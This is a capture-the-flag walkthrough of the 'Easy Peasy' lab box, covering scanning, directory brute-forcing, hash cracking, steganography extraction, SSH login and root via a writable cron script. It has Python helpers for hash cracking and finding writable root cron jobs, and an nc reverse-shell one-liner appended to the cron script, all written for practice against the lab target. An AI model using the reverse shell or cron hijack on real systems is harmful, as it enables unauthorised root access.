# Easy Peasy

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0STs_izmAtgZ8NL4L%2F-Mc0So3sFHDvYzE6o8sv%2Fimage.png?alt=media\&token=da50f97f-10e3-4f53-8eff-97348de8bbc0)

## Reconnaissance

Initial nmap scan to find all open TCP ports. `-p-` covers all 65535 ports; `-T5` is fast but can drop results on a lossy VPN link, so a port you expected and did not see is worth re-checking at `-T4`.

```
nmap -p- -T5 10.10.53.168
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0Vce88L1uCBbstAtY%2Fimage.png?alt=media\&token=076d7841-a516-4214-8ee6-8a58658b5d8f)

There are three ports open: 80, 6498 and 65524.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0VtlciQrUiu1p3tRC%2Fimage.png?alt=media\&token=b954bafb-61bd-4f46-a59d-d847f6b29674)

Detailed nmap scan of the three open ports.

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p 80,6498,65524**: limit the scan to the ports found above
* **-oN nmap**: save the output in normal format to a file called `nmap`

```
nmap -sV -sC -p 80,6498,65524 -oN nmap 10.10.53.168
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0VniToMMzLPupJHPZ%2Fimage.png?alt=media\&token=c8fbe632-5bfb-4f7e-8b46-f46654ce2261)

The web server on port 80 is `nginx 1.16.1`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0W0X-2_3HbPkcqu-g%2Fimage.png?alt=media\&token=747ff579-a618-4f3d-9a4a-e86e35dd4459)

Apache is running on the highest port, 65524.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0WCus0VHTQLErg99d%2Fimage.png?alt=media\&token=5b564e0f-98e9-40e9-9b3d-1da088ef2b4d)

## Enumeration

### Port 80: HTTP

Let's visit the site.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0WSbeHnPR6lIk1Rjp%2Fimage.png?alt=media\&token=76912390-4463-41be-b1d7-275849e48f29)

There is nothing interesting in the links provided or in the source code, so let's run `gobuster` to find hidden files and directories.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0_T3559PexdYBvioy%2Fimage.png?alt=media\&token=c84dfd06-ff80-4943-9eb2-079b3f7626da)

Looks like we found a directory. Let's run another gobuster scan against it while we explore it by hand.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0aJUtiMW4fSEG1eAI%2Fimage.png?alt=media\&token=e1ca3607-8c29-4407-b980-ccb15895427d)

We found another directory; let's visit both pages.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0b16tfZUeOGKaLu7Q%2Fimage.png?alt=media\&token=ba9788da-a7a0-4752-b607-37d1988f0fc6)

There seems to be nothing here, so let's go to the `whatever` directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0bWbaufe4QjD6ID0c%2Fimage.png?alt=media\&token=a8353c92-00a5-4a92-afe4-5327a02c4957)

There is nothing on the page, so let's look at the source code.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0bbJdFbytJU2KTtqA%2Fimage.png?alt=media\&token=f024bfbd-dbce-4268-a12f-2e14979a5da4)

We have an encoded string; let's decode it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0bupx9jVpT1UmWQPB%2Fimage.png?alt=media\&token=b9a25a19-fff2-4274-b574-275cd79bd6fe)

We have the first flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0c0saglOtYfmozSmV%2Fimage.png?alt=media\&token=47cf3206-235b-412b-8c3a-0528a355b313)

### Port 65524: HTTP

Let's visit the site.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0XQJIv29IRgEWTDBo%2Fimage.png?alt=media\&token=8d0ad7e2-1864-43f8-abf6-b57b338c8ba8)

It's the Apache2 default page; scrolling down a bit, we find flag 3.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0a-Xsw6kpICY-EZ4p%2Fimage.png?alt=media\&token=4af9f0e9-b1af-40d6-acee-a5c8fa75e77f)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0aFB9fCRhaeqWKFBO%2Fimage.png?alt=media\&token=eb4ab5d5-6351-4b20-8a1c-9068542daedc)

Let's run gobuster to find hidden directories and files.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168:65524/
```

While gobuster is running, let's check `robots.txt`; there is some interesting information there.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0Ya9Nmg8oF3rtODiW%2Fimage.png?alt=media\&token=bf161e6a-4f43-4adf-9c7d-bc82b82fa820)

This looks like a hash, so let's try to crack it. First, let's identify what type of hash it is.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0afKh2hnSZxY7rDAi%2Fimage.png?alt=media\&token=5de97a97-afaf-4b05-9004-2e69ee4c3ec0)

It's an MD5 hash, or at least a 32-character hex digest: MD4 and NTLM digests look identical, so treat the identification as a guess that the cracker confirms. Now let's crack it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0amGHgUFI2jrNN_yU%2Fimage.png?alt=media\&token=3a397a1f-d56e-47d3-937f-aeaf2c22ee6d)

And we have the second flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0arCjEhmJKEEU4ZkG%2Fimage.png?alt=media\&token=960af27b-b2e5-4f02-bd50-88bffa19a068)

Looking back at the default page, there is something else in the source code.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0cysGg96X7ZJsMl33%2Fimage.png?alt=media\&token=5dad6218-7103-451a-a185-652f9b8513ef)

Another hash-looking string; let's crack it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0dFJ5MAl_ILR1JBtu%2Fimage.png?alt=media\&token=44579962-98ac-484f-9872-b5bafcf5a978)

It's another directory, so let's visit it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0dP0pINuVK6KsF9Ys%2Fimage.png?alt=media\&token=2a3f3ac7-e2f9-4aeb-a0d7-e42025726cd4)

It's a page with an image of binary code; let's look at the source code.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0dkuCPnTVV6915Yff%2Fimage.png?alt=media\&token=f4a6d76e-dd0c-46ab-a2a3-a2ddb99b7f05)

We have a string; let's try to identify the hash type.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0e3p3sgaB9rZ22LC5%2Fimage.png?alt=media\&token=1e742376-f8be-460b-9c26-57862a705979)

Let's crack it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0eeFx-6wRfq96s7ZO%2Fimage.png?alt=media\&token=0fe4c9e9-e5a3-419c-ac97-030eae2304c8)

The cracked value looks like a password.
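
The three cracking steps above (the MD5 in `robots.txt`, the string in the default page's source and the string in the binary-code page's source) all follow the same pattern: guess the algorithm from the digest's length and character set, then run a wordlist through that algorithm until one candidate reproduces the digest. The script below is an added example of that flow, not code from the original write-up; the digests and the wordlist in it are constructed for the example rather than taken from the box. It shows what an online hash identifier plus a dictionary attack do under the hood, and why identification is only a guess that the cracker has to confirm.

```python
import hashlib
import re
from typing import Iterable, List, Optional, Tuple

# Candidate algorithms keyed by hex-digest length. Length alone is only a
# guess: 32 hex characters could be MD5, MD4 or NTLM, and 64 could be
# SHA-256, SHA3-256 or BLAKE2s, so the cracker tries every candidate and
# lets a match settle the question.
CANDIDATES_BY_LENGTH = {
    32: ["md5", "md4"],
    40: ["sha1"],
    56: ["sha224"],
    64: ["sha256", "sha3_256", "blake2s"],
    96: ["sha384"],
    128: ["sha512", "sha3_512", "blake2b"],
}

HEX_RE = re.compile(r"^[0-9a-f]+$")


def identify(digest: str) -> List[str]:
    """Return candidate algorithm names for a hex digest, most common first.

    An empty list means the string is not a bare hex digest at all, which is
    the cue to suspect an encoding (base64, hex-of-text, ...) rather than a hash.
    """
    digest = digest.strip().lower()
    if not HEX_RE.match(digest):
        return []
    return list(CANDIDATES_BY_LENGTH.get(len(digest), []))


def crack(digest: str, wordlist: Iterable[str], algorithms=None) -> Optional[Tuple[str, str]]:
    """Dictionary attack: hash every word with every candidate algorithm.

    Returns (algorithm, plaintext) on the first match, or None if no word in
    the list produces the digest. Line endings are stripped so an open
    wordlist file can be passed in directly.
    """
    digest = digest.strip().lower()
    algorithms = algorithms if algorithms is not None else identify(digest)
    words = [w.rstrip("\r\n") for w in wordlist]
    for algo in algorithms:
        try:
            hashlib.new(algo)  # probe: some OpenSSL builds no longer ship MD4
        except ValueError:
            continue
        for word in words:
            if hashlib.new(algo, word.encode("utf-8")).hexdigest() == digest:
                return algo, word
    return None


# Constructed sample data for this example; on a real engagement the digest
# comes from the target and the wordlist is something like rockyou.txt.
SAMPLE_WORDS = ["password", "letmein", "sunshine", "qwerty", "dragon"]
SAMPLE_MD5 = hashlib.md5(b"sunshine").hexdigest()
SAMPLE_SHA256 = hashlib.sha256(b"letmein").hexdigest()


def demo() -> dict:
    """Run the identify-then-crack flow over the constructed samples."""
    return {
        "md5": (identify(SAMPLE_MD5), crack(SAMPLE_MD5, SAMPLE_WORDS)),
        "sha256": (identify(SAMPLE_SHA256), crack(SAMPLE_SHA256, SAMPLE_WORDS)),
        "not_in_list": crack("0" * 32, SAMPLE_WORDS),
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # usage: python3 crack.py <hex digest> <wordlist>
        with open(sys.argv[2], encoding="utf-8", errors="ignore") as fh:
            print(crack(sys.argv[1], fh))
    else:
        for name, result in demo().items():
            print(name, result)
```

Run it as `python3 crack.py <hex digest> rockyou.txt` against a real digest. For anything beyond a quick check, hashcat or John the Ripper are far faster, but the logic is the same: a wrong algorithm guess simply never matches, which is why trying every plausible candidate beats trusting the identifier.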

Now let's download the binary-code picture and check whether anything is hidden in it using `steghide`.

```
steghide --extract -sf binarycodepixabay.jpg
```

It asks for a passphrase, so I used the password we just cracked.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0eqwfqXEI7a-ocPYc%2Fimage.png?alt=media\&token=a2cd9550-233c-42ed-966b-fdc4a9e1957d)

We found a text file; let's read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0ewJCSTf4A_GU6zk-%2Fimage.png?alt=media\&token=297d2903-e63f-4d56-a554-b890649ab73b)

We have a username and a password written in binary; let's decode it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0f5re_tIXRJu74xz6%2Fimage.png?alt=media\&token=732508ed-db0f-4e31-88e2-f55c964863c5)
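
Decoding the binary by hand is worth knowing, because copy/paste from a screenshot or a terminal tends to drop a leading zero or a separator, and an online decoder then silently produces garbage. The block below is an added example, not code from the original write-up; the sample bits and the `key: value` file layout are constructed assumptions for the example, not the contents of the file extracted from the image.

```python
import re

# Constructed sample: eight-bit groups separated by spaces, the usual way a
# "binary password" is written down.
SAMPLE_BINARY = "01110011 01100101 01100011 01110010 01100101 01110100"

# Constructed sample of a small credential file; the real file's layout is
# whatever the screenshot shows.
SAMPLE_FILE = "username: alice\npassword: " + SAMPLE_BINARY + "\n"


def binary_to_text(blob: str) -> str:
    """Decode a run of binary into ASCII text.

    Handles the two layouts seen in practice: groups separated by spaces,
    newlines or other non-binary characters (each group is one byte, and a
    group shorter than 8 bits merely lost its leading zeros), or one unbroken
    run that is cut into 8-bit chunks. A bit count that does not divide into
    bytes, or a group longer than 8 bits, usually means a character was lost
    or a separator was dropped, so it raises instead of guessing.
    """
    groups = re.findall(r"[01]+", blob)
    if not groups:
        raise ValueError("no binary digits found")
    if len(groups) > 1:
        for g in groups:
            if len(g) > 8:
                raise ValueError(f"group {g!r} is longer than one byte")
        values = [int(g, 2) for g in groups]
    else:
        bits = groups[0]
        if len(bits) % 8:
            raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
        values = [int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)]
    return bytes(values).decode("ascii")


def text_to_binary(text: str) -> str:
    """Inverse of binary_to_text: space-separated 8-bit groups."""
    return " ".join(f"{b:08b}" for b in text.encode("ascii"))


def decode_credentials(text: str) -> dict:
    """Turn 'key: value' lines into a dict, decoding any value that is binary.

    Values that are plain text (the username here) are kept as they are, so
    the whole file can be fed in without first picking out the binary line.
    """
    creds = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        key, value = key.strip(), value.strip()
        if re.fullmatch(r"[01 ]+", value):
            value = binary_to_text(value)
        creds[key] = value
    return creds


if __name__ == "__main__":
    print(decode_credentials(SAMPLE_FILE))
```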

We found the password, so let's log in through SSH. The SSH server is running on port `6498` according to our nmap scan.

```
ssh -p 6498 boring@10.10.53.168
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0fZ3EIpf_GpdvJCfR%2Fimage.png?alt=media\&token=7e08d0ec-1bea-4ceb-8cb0-53d41c66a4c8)

We are logged in.

We can read the `user.txt` file, but its contents are encoded, so I will leave decoding it to you. (Hint: CyberChef and ROT13.)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0ftJgzYZjyt_bC-Ef%2Fimage.png?alt=media\&token=785a1bbc-47ba-4442-a105-cccb38ebc886)
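
ROT13 is a Caesar shift of 13 positions, and since 13 + 13 = 26 it is its own inverse. When the shift is not known, a practitioner does not guess: there are only 26 possibilities, so all of them are tried and the readable one is picked out. The block below is an added example and not code from the write-up; it implements the general Caesar shift, ROT13 as the special case, and a brute force that selects the shift whose output contains a marker. The sample ciphertext and the default `flag{` marker are assumptions made for this example, and the real `user.txt` stays with the reader as the author intended.

```python
from typing import List, Optional, Tuple

# Constructed sample: a ROT13-encoded line in the shape of a CTF flag.
SAMPLE_CIPHERTEXT = "synt{ebg13_vf_abg_rapelcgvba}"


def caesar(text: str, shift: int) -> str:
    """Rotate ASCII letters by `shift` positions (mod 26), preserving case.

    Digits, braces, underscores and anything else pass through unchanged,
    which is why flag{...} keeps its shape after decoding.
    """
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT13 is the Caesar shift of 13; applying it twice returns the input."""
    return caesar(text, 13)


def brute_force(ciphertext: str) -> List[Tuple[int, str]]:
    """All 26 shifts as (shift, candidate), for when no marker is known."""
    return [(s, caesar(ciphertext, s)) for s in range(26)]


def find_shift(ciphertext: str, marker: str = "flag{") -> Optional[Tuple[int, str]]:
    """Return (shift, plaintext) for the first shift whose output contains
    `marker` (case-insensitive), or None if no shift does."""
    for shift, candidate in brute_force(ciphertext):
        if marker.lower() in candidate.lower():
            return shift, candidate
    return None


if __name__ == "__main__":
    print(find_shift(SAMPLE_CIPHERTEXT))
    for shift, candidate in brute_force(SAMPLE_CIPHERTEXT):
        print(f"{shift:2d}  {candidate}")
```

`tr 'A-Za-z' 'N-ZA-Mn-za-m'` does the same as `rot13()` from a shell on the box itself, which is handy when the file is too long to retype into CyberChef.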

We can also answer all the other questions.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0gCt8wWPk_GuT9A0r%2Fimage.png?alt=media\&token=fc12069b-4b91-4eb1-9104-6457fadee46a)

## Privilege Escalation

As the room has cronjob as one of its tags, I looked for `.sh` files on the system owned by the user boring. The glob is quoted so the shell does not expand it against the current directory before `find` sees it.

```
find / -type f -user boring -name "*.sh" 2>/dev/null
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0h9-8tC0Wk9tvZpQA%2Fimage.png?alt=media\&token=fd719af4-1170-4d4a-903a-2a7dff16c188)

Looks like we have a file; let's look at it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0hGHMsk4AuIqkXXuA%2Fimage.png?alt=media\&token=e0e8ad61-aa05-485b-aa0a-8ea2a4041509)
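
A comment inside a script saying it runs as root is a claim, not proof. Before writing into the file, confirm two things: that a cron entry actually schedules it as root (the system crontab and the files under `/etc/cron.d` carry a user field, per-user crontabs do not), and that your user can write to the script. The parser below is an added example, not code from the write-up; the crontab text and the script path in it are constructed placeholders for what `cat /etc/crontab` and the `find` above show on the target.

```python
import os
import shlex
from dataclasses import dataclass, field
from typing import Callable, List, Tuple

# Constructed sample of a system crontab. The path to .mysecretcronjob.sh is a
# placeholder for wherever `find` located it; the root user field on that line
# is what makes the entry interesting.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /home/boring/.mysecretcronjob.sh
@reboot         root    /usr/local/bin/start-service
*/5 *   * * *   boring  /home/boring/backup.sh
"""


@dataclass
class CronEntry:
    schedule: str
    user: str
    command: str
    paths: List[str] = field(default_factory=list)  # absolute paths in the command


def absolute_paths(command: str) -> List[str]:
    """Every absolute path mentioned in a command: the script itself, or a
    script handed to an interpreter such as `/bin/bash /path/job.sh`."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes; fall back to a whitespace split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def parse_system_crontab(text: str) -> List[CronEntry]:
    """Parse /etc/crontab or /etc/cron.d/* lines, which carry a user field.

    Skips comments, blank lines and VAR=value assignments, and accepts both
    the five-field schedule and the @reboot / @hourly shortcuts.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # environment assignment such as PATH=...
            continue
        if line.startswith("@"):
            parts, nfields = line.split(None, 2), 1
        else:
            parts, nfields = line.split(None, 6), 5
        if len(parts) < nfields + 2:
            continue  # malformed line
        schedule = " ".join(parts[:nfields])
        user, command = parts[nfields], parts[nfields + 1]
        entries.append(CronEntry(schedule, user, command, absolute_paths(command)))
    return entries


def writable_root_jobs(
    entries: List[CronEntry],
    is_writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
) -> List[Tuple[CronEntry, str]]:
    """Entries that run as root and reference a path the current user can write.

    Each hit is the privilege escalation: whatever is appended to that file
    runs as root on the job's next execution. `is_writable` is injectable so
    the check can be exercised without real files (and without root, whose
    os.access answers yes to everything).
    """
    hits = []
    for entry in entries:
        if entry.user != "root":
            continue
        for path in entry.paths:
            if is_writable(path):
                hits.append((entry, path))
    return hits


def demo() -> List[str]:
    """Run the check over the sample, pretending only the hidden script is writable."""
    fake_writable = lambda p: p.endswith(".mysecretcronjob.sh")
    hits = writable_root_jobs(parse_system_crontab(SAMPLE_CRONTAB), fake_writable)
    return [path for _, path in hits]


if __name__ == "__main__":
    if os.path.exists("/etc/crontab"):  # on the target, run as the low-privileged user
        with open("/etc/crontab") as fh:
            for entry, path in writable_root_jobs(parse_system_crontab(fh.read())):
                print(f"{entry.schedule:>15}  root  {path}  <- writable by you")
    else:
        print(demo())
```

Run it as the low-privileged user, since `os.access` answers for whoever runs it. A schedule of `* * * * *` also tells you how long to wait for the shell in the next step: at most one minute.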

It says it will run as root, so let's append a reverse shell to the file and let cron hand us a shell as root. Appending with `>>` rather than overwriting keeps whatever the script already does intact, so the job keeps behaving normally apart from the extra connection.

```
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" >> .mysecretcronjob.sh
```

Make sure to change the IP in the command to your own attacking machine's address, and start a netcat listener on port 1234 before the job next fires.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0hbnCw6aoGbnjb6ku%2Fimage.png?alt=media\&token=af779516-ac2d-4108-bcc7-6a5a1537bab6)

Once you echo the command into the file, its contents should look like this.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0imnhRimz9gZngqK0%2Fimage.png?alt=media\&token=9608776b-c7e7-4b40-a4df-aee02da63fab)

The next time cron runs the job you should get a shell as root.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0iBpPvHcu4a4mgNQl%2Fimage.png?alt=media\&token=3f370b52-3a7a-44a6-b53a-9340ec5ae83f)
